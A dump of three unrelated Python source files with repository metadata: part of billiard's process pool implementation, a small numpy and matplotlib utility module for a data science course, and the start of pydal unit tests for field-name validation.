abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool)
if threads:
self._task_handler.start()
# Thread killing timedout jobs.
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
if self.timeout is not None or self.soft_timeout is not None:
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
self.check_timeouts = None
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._ctx.Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
debug('Supervisor: worked %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the functions return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from billiard.dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
flaviogrossi/billiard
|
billiard/pool.py
|
Python
|
bsd-3-clause
| 64,479 | 0 |
# coding: utf-8
# numpy_utils for Intro to Data Science with Python
# Author: Kat Chuang
# Created: Nov 2014
# --------------------------------------
import numpy
## Stage 2 begin
fieldNames = ['', 'id', 'priceLabel', 'name','brandId', 'brandName', 'imageLink',
'desc', 'vendor', 'patterned', 'material']
dataTypes = [('myint', 'i'), ('myid', 'i'), ('price', 'f8'), ('name', 'a200'),
('brandId', '<i8'), ('brandName', 'a200'), ('imageUrl', '|S500'),
('description', '|S900'), ('vendor', '|S100'), ('pattern', '|S50'), ('material', '|S50'), ]
def load_data(filename):
my_csv = numpy.genfromtxt(filename, delimiter='\t', skip_header=1,
names=fieldNames, invalid_raise=False,
dtype=dataTypes)
return my_csv
#2.a count
def size(my_csv):
print("Length (numpy): {}".format(my_csv.size))
#2.b sum
def calculate_numpy_sum(my_field):
field_in_float = [float(item) for item in my_field]
total = numpy.sum(field_in_float)
return total
#2.c mean
def find_numpy_average(my_field):
field_in_float = [float(item) for item in my_field]
total = calculate_numpy_sum(field_in_float)
size = len(my_field)
average = total / size
return average
#2.d max, min
def numpy_max(my_field_in_float):
return numpy.amax(my_field_in_float)
def numpy_min(my_field_in_float):
return numpy.amin(my_field_in_float)
## Stage 2 end
# --------------------------------------
## Stage 3 begin
from my_utils import filter_col_by_string, filter_col_by_float
## Stage 3 end
# --------------------------------------
## Stage 4 begin
from my_utils import write_to_file, write_brand_and_price_to_file
## Stage 4 end
# --------------------------------------
## Stage 5 begin
import matplotlib.pyplot as plt
plt.style.use('ggplot')
def plot_all_bars(prices_in_float, exported_figure_filename):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
prices = list(map(int, prices_in_float))
X = numpy.arange(len(prices))
width = 0.25
ax.bar(X+width, prices, width)
ax.set_xlim([0, 5055])
fig.savefig(exported_figure_filename)
def create_chart_for_embed(sample, title):
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
plt.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
def export_chart(sample, title):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
prices = sorted(map(int, sample))
x_axis_ticks = list( range(len(sample)) )
ax.plot(x_axis_ticks, prices, 'g', label='price points', linewidth=2)
ax.set_title(title)
ax.set_xlabel(title)
ax.set_ylabel('Number of Ties')
if len(prices) > 20:
ax.set_xlim([0, round(len(prices), -1)])
else:
ax.set_xlim([0, len(prices)])
fig.savefig('_charts/' + title + '.png')
def prices_of_list(sampleData):
temp_list = []
for row in sampleData[1:]:
priceCol = float(row[2])
temp_list.append(priceCol)
return temp_list
## Stage 5 end
# --------------------------------------
## Stage 6 begin
## Stage 6 end
# --------------------------------------
|
katychuang/python-data-sci-basics
|
src/numpy_utils.py
|
Python
|
mit
| 3,188 | 0.016311 |
# -*- coding: utf-8 -*-
"""
Basic unit tests
"""
from __future__ import print_function
import os
import glob
import datetime
import json
import pickle
from pydal._compat import basestring, StringIO, integer_types, xrange, BytesIO, to_bytes
from pydal import DAL, Field
from pydal.helpers.classes import SQLALL, OpRow
from pydal.objects import Table, Expression, Row
from ._compat import unittest
from ._adapt import (
DEFAULT_URI,
IS_POSTGRESQL,
IS_SQLITE,
IS_MSSQL,
IS_MYSQL,
IS_TERADATA,
IS_NOSQL,
IS_ORACLE,
)
from ._helpers import DALtest
long = integer_types[-1]
print("Testing against %s engine (%s)" % (DEFAULT_URI.partition(":")[0], DEFAULT_URI))
ALLOWED_DATATYPES = [
"string",
"text",
"integer",
"boolean",
"double",
"blob",
"date",
"time",
"datetime",
"upload",
"password",
"json",
"bigint",
]
def setUpModule():
if IS_MYSQL or IS_TERADATA or IS_ORACLE:
db = DAL(DEFAULT_URI, check_reserved=["all"])
def clean_table(db, tablename):
try:
db.define_table(tablename)
except Exception as e:
pass
try:
db[tablename].drop()
except Exception as e:
pass
for tablename in [
"tt",
"t0",
"t1",
"t2",
"t3",
"t4",
"easy_name",
"tt_archive",
"pet_farm",
"person",
]:
clean_table(db, tablename)
db.close()
def tearDownModule():
if os.path.isfile("sql.log"):
os.unlink("sql.log")
for a in glob.glob("*.table"):
os.unlink(a)
class TestFields(DALtest):
def testFieldName(self):
"""
- a "str" something
- not a method or property of Table
- "dotted-notation" friendly:
- a valid python identifier
- not a python keyword
- not starting with underscore or an integer
- not containing dots
Basically, anything alphanumeric, no symbols, only underscore as
punctuation
"""
# Check that Fields cannot start with underscores
self.assertRaises(SyntaxError, Field, "_abc", "string")
# Check that Fields cannot contain punctuation other than underscores
self.assertRaises(SyntaxError, Field, "a.bc", "string")
# Check that Fields cannot be a name of a method or property of Table
for x in ["drop", "on", "truncate"]:
self.assertRaises(SyntaxError, Field, x, "string")
# Check that Fields allows underscores in the body of a field name.
self.assertTrue(
Field("a_bc", "string"),
"Field isn't allowing underscores in fieldnames. It should.",
)
# Check that Field names don't allow a python keyword
self.assertRaises(SyntaxError, Field, "True", "string")
self.assertRaises(SyntaxError, Field, "elif", "string")
self.assertRaises(SyntaxError, Field, "while", "string")
# Check that Field names don't allow a non-valid python identifier
non_valid_examples = ["1x", "xx$%@%", "xx yy", "yy\na", "yy\n"]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Field, a, "string")
# Check that Field names don't allow a unicode string
non_valid_examples = non_valid_examples = [
"ℙƴ☂ℌøἤ",
u"ℙƴ☂ℌøἤ",
u"àè",
u"ṧøмℯ",
u"тεṧт",
u"♥αłüℯṧ",
u"ℊεᾔ℮яαт℮∂",
u"♭ƴ",
u"ᾔ☤ρℌℓ☺ḓ",
]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Field, a, "string")
def testFieldTypes(self):
# Check that string, and password default length is 512
for typ in ["string", "password"]:
self.assertTrue(
Field("abc", typ).length == 512,
"Default length for type '%s' is not 512 or 255" % typ,
)
# Check that upload default length is 512
self.assertTrue(
Field("abc", "upload").length == 512,
"Default length for type 'upload' is not 512",
)
# Check that Tables passed in the type creates a reference
self.assertTrue(
Field("abc", Table(None, "temp")).type == "reference temp",
"Passing a Table does not result in a reference type.",
)
def testFieldLabels(self):
# Check that a label is successfully built from the supplied fieldname
self.assertTrue(
Field("abc", "string").label == "Abc", "Label built is incorrect"
)
self.assertTrue(
Field("abc_def", "string").label == "Abc Def", "Label built is incorrect"
)
def testFieldFormatters(self): # Formatter should be called Validator
# Test the default formatters
for typ in ALLOWED_DATATYPES:
f = Field("abc", typ)
if typ not in ["date", "time", "datetime"]:
